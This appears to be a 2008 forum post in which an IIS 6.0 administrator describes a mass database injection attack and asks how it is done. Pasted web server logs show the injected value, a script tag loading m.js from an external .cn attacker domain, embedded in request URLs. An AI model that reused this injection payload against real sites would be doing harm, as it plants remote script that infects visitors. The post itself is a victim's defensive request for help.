somebody has been killing me.
our uploads directory on IIS6.0 has been violated.
i first thought it was our SQL server PC or the Web Server PC.
i only open the ports : 80 (on webserver)
i only open the ports : 1433,1434 (on sql server)
still they come in.
its a malicious .js script that appends the line
<script+src=
http:/www.whatever??.cn/m.js></scr
ipt>
(ive had 7 variations of the line so far) to every single field in my database that has nvarchar,char, or text.
this is what i found in the log on the webserver:
2008-05-16 07:27:33 192.168.1.2 GET /uploads/site/915class.gif
<script+sr
c=
http:/www.qiqi111.cn/m.js></
script> - 80 - 212.165.147.42 Mozilla/4.0+(compatible;+M
SIE+7.0;+W
indows+NT+
6.0;+SLCC1
;+.NET+CLR
+2.0.50727
;+.NET+CLR
+3.0.04506
;+.NET+CLR
+1.1.4322)
404 0 2
2008-05-16 07:29:18 192.168.1.2 GET /uploads/site2/thumb11s.jp
g<script+s
rc=
http:<s
cript+src=
http:/www.qiqi111.cn/m.js></sc
ript> - 80 - 212.165.147.42 Mozilla/4.0+(compatible;+M
SIE+7.0;+W
indows+NT+
6.0;+SLCC1
;+.NET+CLR
+2.0.50727
;+.NET+CLR
+3.0.04506
;+.NET+CLR
+1.1.4322)
404 0 2
2008-05-16 07:29:18 192.168.1.2 GET /uploads/site1/THUMB1.jpg<
script+sr<
script+src
=
http:/www.qiqi111.cn/m.js></s
cript> - 80 - 212.165.147.42 Mozilla/4.0+(compatible;+M
SIE+7.0;+W
indows+NT+
6.0;+SLCC1
;+.NET+CLR
+2.0.50727
;+.NET+CLR
+3.0.04506
;+.NET+CLR
+1.1.4322)
404 0 2
this is just todays, the breach comes from a different IP every time, today's is from Pakistan for example.
I changed IIS to not run Scripts and have only read being allowed on the uploads directory.
they still do it.
i've even deleted for e.g. site1/1.jpg, and then when i check, that file is in the log again, and thus the script has been run against a file that does not even exists.
i have nod32 antivirus on the webserver, i have spybot now installed, latest updates on both, etc,.
i know what the contents of the script is that is being run, i just dont know how they do it
please help, nobody can it seems
Start Free Trial
